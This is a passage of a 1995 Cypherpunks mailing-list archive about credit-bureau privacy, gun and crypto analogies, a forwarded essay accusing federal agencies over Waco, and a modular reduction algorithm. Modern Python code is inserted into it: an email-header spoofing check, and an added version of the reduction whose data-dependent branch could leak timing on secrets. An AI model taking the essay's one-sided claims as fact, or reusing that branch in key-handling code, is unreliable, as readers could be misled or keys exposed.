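\tby mx.example.org with SMTP id PAA00002
\tfor <me@example.org>; Wed, 6 Sep 95 15:40:05 -0700
Received: from mail.example.edu (dialup7.example.com [198.51.100.7])
\tby relay.example.net with SMTP id PAA00001; Wed, 6 Sep 95 15:40:01 -0700
Received: from campus.example.edu (campus.example.edu [203.0.113.9])
\tby mail.example.edu with SMTP id PAA00000; Wed, 6 Sep 95 15:39:58 -0700
From: dean@example.edu
To: me@example.org
Subject: header test

test body
"""

# Constructed sample 2: the relay wrote only the HELO name.
SAMPLE_UNRECORDED = """\
Received: from relay.example.net (relay.example.net [192.0.2.25])
\tby mx.example.org with SMTP id PAA00004; Wed, 6 Sep 95 15:52:14 -0700
Received: from mail.example.edu by relay.example.net with SMTP id PAA00003;
\tWed, 6 Sep 95 15:52:11 -0700
From: dean@example.edu
To: me@example.org
Subject: header test 2

test body
"""

TRUSTED = {"mx.example.org", "relay.example.net"}  # servers whose lines we believe


def parse_received(value):
    """Return helo/peer/ip/by from one Received header, or None if unparsable."""
    m = RECEIVED_RE.search(" ".join(value.split()))  # unfold continuation lines
    if not m:
        return None
    hop = m.groupdict()
    hop["by"] = hop["by"].rstrip(";").lower()
    return hop


def in_domain(host, domain):
    """Heuristic: host is the domain itself or a name underneath it."""
    host, domain = host.lower().rstrip("."), domain.lower()
    return host == domain or host.endswith("." + domain)


def check_origin(raw, trusted_servers):
    """Compare the From domain with the peer recorded at the trust boundary."""
    msg = message_from_string(raw)
    claimed = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    # Headers are newest first. Walk down only while each line was written by
    # a server we trust; anything below that boundary arrived with the message.
    boundary = None
    for hop in hops:
        if hop is None or hop["by"] not in trusted_servers:
            break
        boundary = hop
    result = {"claimed_domain": claimed, "hop": boundary}
    if boundary is None:
        result["verdict"] = "no-trusted-hop"
    elif not (boundary["peer"] or boundary["ip"]):
        result["verdict"] = "origin-not-recorded"
    elif boundary["peer"] and in_domain(boundary["peer"], claimed):
        result["verdict"] = "origin-matches-from"
    else:
        result["verdict"] = "origin-differs-from-from"
    return result


if __name__ == "__main__":
    for name, raw in (("recorded", SAMPLE_RECORDED), ("unrecorded", SAMPLE_UNRECORDED)):
        r = check_origin(raw, TRUSTED)
        print(name, r["verdict"], r["hop"])
```
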






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:09:51 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac7376ea1a0210046d3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:39 PM 9/6/95, David Neal wrote:

>From the huge number of people in the database, it would seem that TRW
>is now marketing a subset of their credit records they keep on everyone.
>Does anyone else remember the flap over Lotus' product (Magellan) that
>was going to allow something similar?
>
>The risks? This is the perfect database if you want to red-line your offerings.
>I'm sure others will have more creative answers.

About the Lotus Marketplace product of several years ago, many of us
thought at the time that the furor was misdirected, and the result
ultimately damaging to privacy concerns.

Why? Because the ZIP code data is _already_ available to the mass
marketers, etc. The Marketplace product merely made it available to "the
rest of us," allowing many people to have their eyes opened about what
exists.

By getting Lotus to pull the product, the public went back to sleep, lulled
into the false sense of privacy that their ZIP codes were once again
private.

Privacy needs to be protected by keeping some things secret, not by passing
laws limiting the records others can collect from public or voluntarily
offered information.

Don't get me wrong--I don't like TRW Credit, Equifax, TransUnion, or anyone
else compiling "dossiers" on my spending habits, my travel itineraries,
etc. But by using my VISA and MasterCard cards, and by agreeing to their
terms and conditions, I am tacitly accepting that credit reporting agencies
will have access to my transactions.

If there is a "market for privacy," and this is something we've talked
about before, then someone will offer "The Privacy Card." We can debate
what this card might offer, ranging from complete unlinkability (ecash
protocols of various sorts) to non-reporting of records to the Big Three of
credit reporting agencies. Even cards issued in the name of pseudonyms, of
various sorts and backings.

Should there be laws _against_ this kind of Privacy Card, we should fight
these laws.

But we should not lull ourselves into a false sense of security by adopting
the unconstitutional and anti-liberty approach of having "Fair Credit
Reporting Act" and "Data Privacy Act" sorts of laws.

In my opinion, of course.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:16:27 PDT
To: Rob Lowry <cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac737a2b1b0210043115@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 PM 9/6/95, Rob Lowry wrote:

>Beyond having the willies.. This is more than just scary, it feels like
>rape when you think about it for awhile. Everything you buy, on credit, is
>recorded and sold to someone who wants to know your secrets. Everytime
>you make a banking transaction, someone is watching and compiling the
>data.
>
>Is there any legal recourse to get your name removed from the sellable list?
>Or is it too late and we can not save even the vestiges of our privacy?

Rob, I have entered this posting of yours into the "BlackNet Dossier
Service" I operate.

Sounds creepy and scary, eh? Well, it's part of freedom.

The "legal recourse" you mention about having your name taken off lists
kept by people or agencies ultimately involves visits by the authorities to
private homes (like mine) to verify that the data are being "properly
collected" and that no "illegal or incorrect data" are being stored.

If someone wants something kept secret, the solution is to keep it secret.

If someone doesn't want their postings going into my 220 megabyte file of
postings, they shouldn't send them to me. Or they should adopt a digital
pseudonym, unlinkable to their True Name or any other nyms they may have.

Things are much simpler and less stressful when you don't look to the law
to fix things.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 16:31:35 PDT
To: cypherpunks@toad.com
Subject: Re: Flame: Re: Collection of personal info
In-Reply-To: <9509062238.AA06272@cs.umass.edu>
Message-ID: <Pine.LNX.3.91.950906162650.6403A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain




> Some close friends of mine have been raped, and I get the overwhelming
> impression from them that rape has about as much in common with the sale of
> financial databases as it does with Rice-a-Roni. Find a better analogy, or
> you'll sound about as credible as those who insist the Internet teems with
> pedophilic bombers who push dope outside preschools.

Sorry if my choice of words offended you.. the intent was to express the 
feeling of being violated without consent. Perhaps I should have used the 
term violated or some other less violent term.

The point being, I did not give permission for my records to be 
distributed, nor did I see a disclaimer on my credit cards that states 
that the transactions I make will be sold off to mailing houses in order 
to target me for additional sales.

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 6 Sep 95 14:44:05 PDT
To: "Thomas M. Swiss" <tms@TIS.COM>
Subject: Re: Collection of personal info
In-Reply-To: <199509062125.RAA10123@ziggy.tis.com>
Message-ID: <Pine.BSI.3.91.950906163504.11543A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Thomas M. Swiss wrote:

> 
> David Neal <dneal@usis.com> writes:
> 
> >I sent this to the risks moderator some time back, but I guess
> >he didn't like it. 
> 
>      I can guess why; PGN might be skeptical of your precognitive powers. B->
> 
> >...
> >As advertised in the trade magazine "DM News" (Direct Marketing News),
> >Apr. 24, 1997, V. 17 N. 16.  I've typed the entire text of the advertisement,
>           ^^^^

Well, I did say all typos were _mine_ -- That's 1995 folks, just for the
record and thanks to Tom Swiss for being the first in a long line
of people who will point this out. :-)

But back to the topic; am I the only one who gets the willies just
reading this?  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 16:37:53 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Collection of personal info
In-Reply-To: <ac737a2b1b0210043115@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.950906163311.6403B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> Rob, I have entered this posting of yours into the "BlackNet Dossier
> Service" I operate.

At least you notified me.. :) Something the TRW crew or others like them 
do not do.


> If someone doesn't want their postings going into my 220 megabyte file of
> postings, they shouldn't send them to me. Or they should adopt a digital
> pseudonym, unlinkable to their True Name or any other nyms they may have.

This is true.. I could adopt a nym, such as I use on my BBS, or when I am 
doing other stuff on the net.. but it is difficult at best to get a new 
set of credit cards, ID and so on with a new name/alias and still 
maintain your own name. If it were possible to have an alias in real 
life, as easy as it is to get one on the 'net that is, then I would most 
certainly do so..

'Frothmonger' <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 17:08:05 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.SUN.3.91.950906194621.9114A-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.91.950906165743.8113A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Which tells me how serious you really are about your privacy.  You have 
> made a decision here about how much trouble privacy is worth to you, 
> which is "not much."

If I were single, it would be a lot easier to just start making up names 
and living under assumed aliases.. but with a wife and two kids, I have 
to follow the rules a bit more.. 

My privacy is worth variable amounts depending on who has access to it.. 
I certainly do not care if anyone on this list knows who I am or not, as 
it is something I voluntarily chose to join. Selling info about me, 
without notifying me before hand is another situation altogether. Even 
the magazines I subscribe to have notices that my name may be sold.. and 
the mags that don't have such a warning, but sell my name anyways, get 
cancelled as soon as I discover it. Far easier to stop by the local PC 
store and buy it a week later than to have mounds of junk mail piling up.

> I hear people bitch about privacy endlessly.  Privacy helps those who 
> help themselves to privacy.  I think Mr. May was precisely correct in saying 
> that it is so much easier and simpler for one to rely on self privacy 
> insurance rather than government privacy insurance.

Again, you both are correct, and perhaps I was overstating my position in 
regards to the TRW/etc. groups.. I have a tendency to do so. Each of us 
has the responsibility to monitor the activities in our lives, both 
directly and indirectly. Whether this is watching our spending to make 
sure we do not overcharge, or encrypting mail to keep it secure, we need 
to be aware of what we are doing, and the reactions of others as a result 
of our actions. In this case, the action is spending money on credit, and 
the reaction is being monitored by credit agencies. My solution was to 
get rid of all the credit cards 4 years ago.. my credit history is 
trashed in part due to very low activity over the last 4 years, and of 
course, the side effect of maxing out 4 cards.

-stepping off soapbox and looking for the next topic..-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:57:45 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac7381811c021004ea72@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 9/6/95, Rob Lowry wrote:
>> Rob, I have entered this posting of yours into the "BlackNet Dossier
>> Service" I operate.
>
>At least you notified me.. :) Something the TRW crew or others like them
>do not do.

If you mean that TRW Credit does not inform you every time a transaction is
entered into their files, this is true. Be grateful they don't.

If you mean the existence of the record itself has not been reported to
you, it has hardly been a secret. It has been very well-known for many
years that these records exist, and you can subscribe to a service that
reports to you regularly about your credit record. (No, it is not "free,"
but why should it be? It costs them money to send this stuff to you, and
they see it as a valid business market, as do I. At least the cost is
fairly nominal.)

Again, you are free to use cash, to use a bank card which protects your
privacy, and so forth.

...
>This is true.. I could adopt a nym, such as I use on my BBS, or when I am
>doing other stuff on the net.. but it is difficult at best to get a new
>set of credit cards, ID and so on with a new name/alias and still
>maintain your own name. If it were possible to have an alias in real
>life, as easy as it is to get one on the 'net that is, then I would most
>certainly do so..

I was not saying such nyms are easy to use in the real world (though
friends of mine have VISA cards in fictitious names, and the cards are
fully functional, and are not just "second names" on their main card).

What I am saying is that we should be very careful not to lobby for laws
which will make the surveillance state _more_ invasive, and more insinuated
into every aspect of our lives.

Be concerned about the dossier society, just don't look to "the government"
to protect you. Not only will they continue to keep their own dossiers (*),
they'll use such "Data Privacy" laws to invade the privacy of others.

(* I've got a long section in my Cyphernomicon on the ties between the Big
Three of credit reporting agencies, the FinCEN and similar folks, the
intelligence agencies, and Witness Protection folks who give out those
wonderful new identities. You think the Big Three don't know immediately
who the 50,000+ people in Witness Protection (aka Witness Security) are?
This may sound like something from the "Vince Foster and Danny Casolaro
conspiracy tapes," but it has some direct links to Cypherpunks issues: the
Feds have the power now to create new identities, falsify past financial
records, and run the scams that these methods imply...and the Big Three are
all headquartered within a few miles of the relevant agencies, in Vienna,
Langley, MacLean, Tyson's Corner, Herndon, Chantilly, Reston, and suchlike
spook haunts in No. Virginia.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 6 Sep 95 14:18:30 PDT
To: hallam@w3.org
Subject: booby-traps, crypto, guns, and tea
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.950906170633.668B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995 hallam@w3.org wrote:

> 
> Under UK law it is certainly illegal to create any device with the
> intention of causing grievous bodily harm to anyone. The right to self
> defense is very precisely that, the right to take reasonable steps to 
> defend yourself with commensurate force if attacked.
[...]

> 
> People who go round drawing parallels to gun ownership and cryptography 
> ownership are simply playing into the government's hands. Cryptography has net 
> benefits to society. Most advocates of gun ownership tend to convince me of 
> little more than they are a danger to society. Regardless of their case they are 
> the biggest argument for gun control, and therefore poor advocates of their 
> cause. I see their attempts to draw parallels with cryptography to be little 
> more than trying to shore up their sinking ship with one that's afloat.
> 
> 
> 		Phill
> 

King George didn't like us owning guns either.  I'm pleased my ancestors 
had a difference of opinion with him concerning this and a few other things.

Brad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 6 Sep 95 08:14:19 PDT
To: cypherpunks@toad.com
Subject: Michael Moriarity in _Penthouse_ on Law Enforcer Power Expansion
Message-ID: <199509061513.RAA17510@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


From: "Clay Irving" <clay@panix.com>
Date: Wed, 6 Sep 1995 07:36:47 -0500
To: sea-list@panix.com
Subject: (Fwd) Michael Moriarity in _Penthousse_
Mime-Version: 1.0

Thought I'd pass this along -- It was in my mailbox this morning...

--- Forwarded mail from "Linda Thompson, American Justice Federation" 
<iquest.net!lindat>

Date: Wed, 6 Sep 95 02:52 EST
To: news@aen.org
From: lindat@iquest.net (Linda Thompson, American Justice Federation)
Subject: Michael Moriarity in _Penthousse_


In the "Special 26th Anniversary Issue -- Collector's Edition" of
_Penthouse_, Michael Moriarity wrote the "Advise & Dissent" feature.
The cover tickler reads: "Michael Moriarity -- Charging Janet Reno with
Genocide"


                TREES FOR ALL THE DEAD CHILDREN
                        by Michael Moriarity

[The author is an Emmy, Tony, and Golden Globe award-winning actor. He
is also an accomplished classical and jazz pianist-composer, with three
CDs in release and another about to be recorded.]

_A nation may lose its liberties in a day and not miss them for a
century._ Montesquieu

I am sitting in a sidewalk cafe in Canada at the moment. I am here
because I can no longer live in the United States of America. The nation
my father knew as a surgeon for the Detroit Police Department and the
country in which my grandfather built a 50-year professional baseball
career has become a nightmare of lies, propaganda, and vicious
disinformation pouring out of Washington, D.C.

Today, the F.B.I. and Janet Reno are asking for new legislation that
would permit them to investigate anyone for simply opposing their ideas
of what causes violence. I protested the attorney general's initial
assault on network television during her back-room meetings with NBC
executives. "What are we talking about here?" asked Dick Wolf, executive
producer of "Law and Order." "Federally controlled programming between
the hours of three and six?"

"How about three to nine."

Janet Reno said that without a question mark. It was not a request. It
seemed to her a foregone conclusion. She had the right to say the most
insane thing I've heard from a reasonably well-dressed person, let alone
the highest law-enforcement officer in the land. She claimed that the
mere words of a murder-mystery TV show were dangerous to the health of
the nation.

I simply asked that she be relieved of her post and sent on a long
vacation and given therapy. Who left their jobs instead? Philip Heymann,
her respected deputy, and yours truly. Resignations in protest. Now she
and her Justice Department -- and even more recently, Bob Dole, the next
frighteningly viable candidate for president of the United States --
would like to brand all artists and producers dealing with dramatized
violence and sex as accessories to drive-by shootings, terrorist
bombings, and the moral degeneration of our nation. And she's hoping
that people like me and Rush Limbaugh, and anyone who makes fun of her,
like David Letterman, will be counted by the American public as
accessories to the bombing in Oklahoma.

Did Al Capone really learn everything he knew from George Raft? Was the
death of Christopher Marlowe a product of the fight scenes in William
Shakespeare's _Romeo and Juliet_?

Blaming violent drama for real-life violence is like indicting
_Penthouse_ for the spread of AIDS.

Until I left my country, I was living in a novel by Franz Kafka, with
characters like the real Elie Wiesel telling me, "It's not possible,
Michael. This is America."

They told Elie and his family the same thing in Europe, just before they
carted him off to Auschwitz. "It's not possible, Elie. This is Germany."

How far is Janet Reno willing to go in her definition of what is causing
violence?

"I know 'Murder She Wrote' has no violent images," said the attorney
general, "but they talk about nothing but violence." What does this
mean? Does she charge that Jessica Fletcher was an agent provocateur for
Timothy McVeigh in the Oklahoma City bombing? Has Angela Lansbury been
derelict in her concern for the children? Was Reno's fear of language,
this frontal assault on the entire meaning of the First Amendment,
merely a lapse in the attorney general's thinking process?  As "kooky"
and as "noisy" and as "paranoid" as I am accused of being, I have never
put together a sentence quite that sick.

Where was the reaction from the Fourth Estate, the one branch of our
democratic process that is sworn, above all, to uphold our freedom of
speech? Today, unfortunately, the media is a direct extension of the
two-party system, and now that the Republicans and Democrats are a
coalition dedicated to expanding federal law-enforcement armies
exponentially, there is little protest from the pundits. A coalition in
a two-party democracy is not an option. It is tyranny.

Since mainstream American journalism is either Republican or Democratic,
we now hear no outcry (although _The New York Times_ did quote one
"law-enforcement official at the Treasury Department .. who spoke on
condition that he not be named, [who] said there was a tremendous
potential for abuse in some of the recent F.B.I. proposals to relax the
standards for investigating suspected terrorists").

Speaking out publicly would risk careers, and if anything is at fault
for the disastrous situation we are in, it is a mad obsession with
career. Read John Dean's _Blind Ambition_ if you don't believe me. My
role in the miniseries "Holocaust" -- that of the Nazi lawyer Eric Dorf
 -- was inspired by the idea that if Watergate's John Dean were a German
professional in the 1930s and less sensitive to his own corruption, he
would have risen to the very top of the Third Reich.  With no strong
feelings, apart from an obsession with his own career, such a man would
find himself standing proudly at the side of Adolf Hitler.

"Free speech," the Justice Department seems to be saying, "is the root
cause of all violence." Has anyone been fired for such a tyrannical
notion? No, but Jocelyn Elders was dismissed for broaching the
possibility that our drug laws should be reexamined, and for speaking
honestly about AIDS and condoms and children.

I began my campaign fighting the drug laws. I'm right back to those
statutes as the main cause of domestic violence in America. Only this
time the violence is not the drive-by shootings in ghettos. It is the
speed with which our law enforcement has been destroyed from within by
its own increasing power.

The F.B.I. will be given almost absolute power to harass and wiretap and
investigate any opponent of the standing government. The drug laws and
now, so conveniently, the Oklahoma City bombing are the linchpins for
billions of dollars pouring into the American law-enforcement community.
Their increasing freedom to hassle suspected anti-big-government
agitators must not be threatened.

Will it work? Not if this nation sees the tapes called _Waco: The Big
Lie_, a two-part examination of the murder of the Branch Davidians.
This video, which Gary Null wrote about in _Penthouse_ this past April,
is all over the country now, and more and more people will see it
despite how Janet Reno, the F.B.I., and the leadership of both parties
try to misinform the public about the tapes and their maker, Linda
Thompson. The obvious questions raised by Thompson's analysis of
government-approved violence are damning to the F.B.I., the Bureau of
Alcohol, Tobacco, and Firearms, Janet Reno, and all other parties
accessory to the obvious cover-up. They show hard evidence of a
government lynch mob at Waco.

If the Rodney King tapes won him $2 million, the implications of _Waco:
The Big Lie_ could win the surviving Branch Davidians tens and possibly
hundreds of millions from the government, criminal charges against
perpetrators, and the downfall of major careerists in the current
administration.

Now, with the help of her spokesmen, who just happen to be President
Clinton and Bob Dole, possibly the next occupant of the White House,
Janet Reno is trying to convince America that her enemies are just as
bad as her own army. They can't be worse. Try as she may, she knows that
history cannot draw the bombers of children as any worse than the
burners of children.

Washington, D.C., is saying that there is a difference between the
children of Waco and the children of Oklahoma City. The deaths in
Oklahoma warrant capital punishment. "Swift and severe punishment," was
the fate the president and attorney general promised for the killers of
federal employees.

Since the F.B.I., the C.I.A., A.T.F., and other arms of federal law
enforcement have been gutting the Bill of Rights for years, such threats
are not unlike the reprisals announced in Germany following the
Reichstag fire.

What about the death of civilians? Not only does Reno not call for
capital punishment for the incineration of the Waco children and the
equally cold-blooded murders in Idaho of survivalist Randy Weaver's wife
and child by federal agents, her response to these crimes doesn't even
merit the term _pursuit of justice_. And any movement that calls for
such justice, like Linda Thompson's American Justice Federation, is
branded "fanatic."

Who has more blood on their hands? Network television or federal law
enforcement?

Until justice befalls the Justice Department, a tree must be planted for
all the children of violence ... including the children of Waco.

"Peace is not the absence of war," said one letter written to me while I
was performing in the television series "Law and Order." "It is the
presence of Just."




---End of forwarded mail from "Linda Thompson, American Justice 
Federation" <iquest.net!lindat>

-- 
    .-.                                                               .-.
   /   \           .-.                                 .-.           /   \
  /     \         /   \       .-.     _     .-.       /   \         /     \
-/--Clay Irving-N2VKG-(clay@panix.com)-\---/---\-----/-----\-------/-------\--
    http://www.panix.com/clay     `-'   `-'     \   /       \     /
           \   /         `-'                     `-'         \   /
            `-'                                               `-'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Wed, 6 Sep 95 14:34:39 PDT
To: David Neal <dneal@usis.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906151200.9473A-100000@usis.com>
Message-ID: <199509062125.RAA10123@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



David Neal <dneal@usis.com> writes:

>I sent this to the risks moderator some time back, but I guess
>he didn't like it. 

     I can guess why; PGN might be skeptical of your precognitive powers. B->

>...
>As advertised in the trade magazine "DM News" (Direct Marketing News),
>Apr. 24, 1997, V. 17 N. 16.  I've typed the entire text of the advertisement,
          ^^^^


-Tom Swiss / tms@tis.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 6 Sep 95 14:57:13 PDT
To: dneal@usis.com (David Neal)
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906163504.11543A-100000@usis.com>
Message-ID: <199509062144.RAA05718@cushing.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| But back to the topic; am I the only one who gets the willies just
| reading this?  

	No.  But the interesting question is, what to do about it?
The answer in part, is personal anonymity through cash and avoiding US
IDs.  But in the long run, that's broken.  You can't have privacy for
1000 people; they'll just toss us all in jail.

	In the long run, we need to convince most Americans that their
freedom is worth more than the Drug War.  The only way to do that is
to look and sound reasonable, and convince people a few at a time.  Do
it with letters to the editor, editorials, articles for your local
newspaper, discussions on the street.

	Try not to rant; if you sound like a nut, people dismiss your
ideas along with you.  Be reasonable and measured.  Use a spell
checker.  Stick to one idea, and give a few backing points.  Don't
insult your opponent.  Don't try for a convoluted closing or slogan.

	(This isn't to disparage the creation of new facts, like an
international remailer network.  I am saying that the problems are as
much political as technological.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 6 Sep 95 17:48:44 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: fast modular reduction
Message-ID: <Pine.SUN.3.91.950906174500.9460B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


During the Crypto '95 Rump Session, Josh Benaloh of Microsoft Corp. 
presented a new modular reduction algorithm that he and I developed.  It 
is faster than the Montgomery method by about 10 to 15%, and is more 
general and easier to understand.  The central idea is that it is easy to 
reduce a number to an equivalent one that's just one "block" (machine 
word) longer than the modulus, by repeatedly subtracting off the highest 
block, and adding back something that's equivalent, but smaller.

In the following pseudocode, B is the radix in which the numbers are 
represented (2^32 for a 32-bit machine), n is the length of modulus in 
blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
is the length of X, and Y is the result.

1. Y = X
2. For i from k down to n+1, repeat steps 3 and 4
3.	Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
4.	If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

Tricks can be used to eliminate step 4, and to reduce Y to n blocks using 
one single precision division, and n more single precision 
multiplications.  The algorithm will hopefully be written up more 
completely soon.

Wei Dai
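
The reduction loop from the message above, as an added Python example (not part of the original post and not the authors' code). The function name block_reduce and the word-size parameter w are assumptions; the result is congruent to X and fits in n+1 blocks but is not fully reduced, so the caller finishes with an ordinary `%`, since the post does not give its finishing trick.

```python
def block_reduce(x, m, w=32):
    """Steps 1-4 of the post: return Y with Y == x (mod m) and Y < B^(n+1).

    B = 2^w is the radix, n the number of blocks in m, U = B^(n+1) mod m.
    Python integers stand in for the multi-precision arrays.
    """
    if m <= 1 or x < 0:
        raise ValueError("need m > 1 and x >= 0")
    B = 1 << w
    n = (m.bit_length() + w - 1) // w          # blocks in the modulus
    U = pow(B, n + 1, m)                       # precomputed once per modulus
    k = max(0, (x.bit_length() - 1) // w)      # index of x's highest block

    y = x                                      # step 1
    for i in range(k, n, -1):                  # step 2: i = k, k-1, ..., n+1
        top = y >> (w * i)                     # Y[i]; y < B^(i+1) on entry
        assert top < B
        shift = w * (i - n - 1)                # multiply by B^(i-n-1)
        # Step 3: drop the highest block and add back an equivalent, smaller
        # value, using B^i == U * B^(i-n-1) (mod m).
        y = y - (top << (w * i)) + ((top * U) << shift)
        # Step 4: the addition can carry into block i at most once.
        # This branch depends on the data being reduced.
        if y >> (w * i):
            y = y - (1 << (w * i)) + (U << shift)
        assert y < (1 << (w * i))              # y now has i blocks
    return y


def mod_via_blocks(x, m, w=32):
    """Canonical residue: block reduction, then a final ordinary reduction."""
    return block_reduce(x, m, w) % m


if __name__ == "__main__":
    # Constructed toy input: 4-bit blocks, 2-block modulus, 5-block X.
    y = block_reduce(0xABCDE, 0xB7, w=4)
    print(hex(y), y % 0xB7, 0xABCDE % 0xB7)
```
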





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 6 Sep 95 17:20:55 PDT
To: hallam@w3.org
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <199509070020.SAA01751@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> There is no self defense argument where the purpose is not to prevent
> physical harm. 


If this were a political philosophy list I would state that self-defense
justification often extends to property (As I believe it should).  Since 
this is a cryptography-and-social-changes-thereof list I will refrain...


> People who go round drawing parallels to gun ownership and cryptography 
> ownership are simply playing into the governments hands.
<snip>


No!  Stop!  Don't say it!  PLEASE go post this message to 
alt.security, talk.politics.guns and alt.fan.david-sternlight and keep it 
away from this list...


Bryce (toss in alt.flame while you are at it...)

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME46vvWZSllhfG25AQEX9QP9HpngGnwA1rSEo7knTJ8RalpK9HbZm0u/
SkO6blQCV8kqcYxN5uZTFefCQPjTakEaUv8YnWpHNGOfFIu8igNOGMTCTV6ptVEy
rYKqupcycYXugN7XGdgQH2UNCUO2M59FpBC65nm4FB05ZUrwYyz0weeCkmxDTZHP
1FKRnjXpWrU=
=b3yP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 6 Sep 95 18:27:08 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: fast modular reduction
Message-ID: <v02120d11ac7406fa32d1@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I was very distressed when Josh gave this presentation; apparently
patents have been filed, etc., and someone from another company
in Europe was claiming they'd _already_ patented it.

What is the story here? From my pov, the performance increase doesn't
justify the ramifications of dealing with yet another potentially
surly patent holder (either Microsoft in your case, or whoever the
irate European fellow was who claims to have already patented it.)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 18:18:52 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac73977f1d0210041506@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 AM 9/7/95, Rob Lowry wrote:

>Again, you both are correct, and perhaps I was overstating my position in
>regards to the TRW/etc. groups.. I have a tendency to do so. Each of us
>has the responsibility to monitor the activities in our lives, both
...

You mentioned you're a newcomer to the list, so all is forgiven.

Seriously, what you'll notice is that people (like me) will respond to
arguments made, and, for obvious reasons, concentrate on the points of
difference rather than the points of agreement.

So, keep posting!

--Tim May

